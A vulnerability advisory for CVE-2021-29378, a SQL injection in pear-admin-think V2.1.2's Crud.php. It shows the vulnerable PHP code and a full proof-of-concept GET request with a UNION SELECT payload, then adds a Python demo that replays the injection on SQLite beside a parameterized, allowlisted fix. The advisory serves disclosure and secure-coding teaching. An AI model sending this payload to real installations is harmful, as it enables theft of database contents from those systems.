CVE-2021-29378: pear-admin-think V2.1.2 has a sql injection vulnerability · Issue #I3DIEC · Pear Admin/Pear Admin Think - Gitee.com
SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.
pear-admin-think V2.1.2 has a sql injection vulnerability
A SQL injection vulnerability exists in pear-admin-think V2.1.2.
This vulnerability allows remote attackers to obtain sensitive user data and even achieve command execution.
URL: /admin.php/admin.crud/list/name/admin_admin?page=1&limit=10
Vulnerable file: app/admin/controller/admin/Crud.php
public function list($name)
{
    // $name comes straight from the route segment (/list/name/<value>) and is
    // concatenated into the SQL text with no escaping, binding or allowlisting,
    // so a double quote in $name breaks out of the string literal.
    $sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
    $this->jsonApi('', 0, $sql);
}
Vulnerability exploitation:
1. Log in to the backstage (admin panel).
2. Crud:
PoC:
GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
Host: www.padmin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://www.padmin.com/admin.php/admin.crud/index
Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
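As an added example (not code from the issue or from the pear-admin-think project), the script below decodes the PoC path segment to show the exact MySQL statement Crud::list() ends up building, reproduces the injection against a stand-in table, and places the parameterized, allowlisted fix beside it. pear-admin-think runs on MySQL; the demo uses Python's built-in sqlite3, so the ported query uses '...' string quoting instead of MySQL's "...", CASE instead of IF(), and "--" instead of "#" for the trailing comment. The stand-in table, its rows, the allowlist and the function names are all constructed for this demo.

```python
"""Added example: vulnerable Crud::list() concatenation vs. a parameterized fix.

The stand-in `columns` table, its rows and ALLOWED_TABLES are constructed for
the demo and are not the project's own data."""
import sqlite3
from urllib.parse import unquote

# Path segment from the issue's PoC request, still URL-encoded.
POC_SEGMENT = '123"union%20select%201,database(),3,4%23'

# Same payload adapted to the SQLite dialect used by the demo below.
SQLITE_PAYLOAD = "123' UNION SELECT 1,sqlite_version(),3,4 --"

# Constructed allowlist standing in for the application's own table names.
ALLOWED_TABLES = frozenset({'admin_admin', 'admin_role'})


def decode_poc_segment() -> str:
    """What the web server hands to $name after URL-decoding the PoC segment."""
    return unquote(POC_SEGMENT)


def vulnerable_sql_mysql(name: str) -> str:
    """The exact MySQL statement Crud::list() builds for a given $name."""
    return ('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,'
            'IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT '
            'FROM information_schema.COLUMNS WHERE TABLE_NAME = "' + name
            + '"order by ORDINAL_POSITION asc')


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for information_schema.COLUMNS (constructed rows)."""
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE columns (TABLE_NAME, COLUMN_NAME, IS_NULLABLE, '
               'DATA_TYPE, COLUMN_COMMENT, ORDINAL_POSITION)')
    db.executemany('INSERT INTO columns VALUES (?,?,?,?,?,?)', [
        ('admin_admin', 'id', 'NO', 'int', '', 1),
        ('admin_admin', 'username', 'NO', 'varchar', 'login name', 2),
        ('admin_admin', 'password', 'NO', 'varchar', '', 3),
    ])
    return db


_SELECT = ("SELECT COLUMN_NAME, IS_NULLABLE, DATA_TYPE, "
           "CASE WHEN COLUMN_COMMENT = '' THEN COLUMN_NAME ELSE COLUMN_COMMENT END "
           "FROM columns WHERE TABLE_NAME = ")


def vulnerable_list(db: sqlite3.Connection, name: str) -> list:
    """SQLite port of the flaw: name is still spliced into the statement text."""
    sql = _SELECT + "'" + name + "' ORDER BY ORDINAL_POSITION ASC"
    return db.execute(sql).fetchall()


def hardened_list(db: sqlite3.Connection, name: str) -> list:
    """Fix: allowlist the table name, then pass it as a bound parameter.

    Binding alone already stops the injection (the whole payload becomes a
    plain string compared against TABLE_NAME). The allowlist additionally
    stops an authenticated user from enumerating columns of tables the app
    never meant to expose, since information_schema covers every schema the
    database account can see.
    """
    if name not in ALLOWED_TABLES:
        raise ValueError(f'table not exposed by this endpoint: {name!r}')
    sql = _SELECT + "? ORDER BY ORDINAL_POSITION ASC"
    return db.execute(sql, (name,)).fetchall()


if __name__ == '__main__':
    print(vulnerable_sql_mysql(decode_poc_segment()))
    db = build_demo_db()
    print('vulnerable:', vulnerable_list(db, SQLITE_PAYLOAD))
    print('hardened:  ', hardened_list(db, 'admin_admin'))
    try:
        hardened_list(db, SQLITE_PAYLOAD)
    except ValueError as err:
        print('rejected: ', err)
```

Running the script prints the MySQL statement with the trailing `"order by ORDINAL_POSITION asc` hidden behind the injected `#`, one injected row containing the database version in place of a column listing, the legitimate column listing from the hardened function, and the rejection of the payload. Note that the union has to supply four columns because the original SELECT returns four, which is why the PoC uses `1,database(),3,4`.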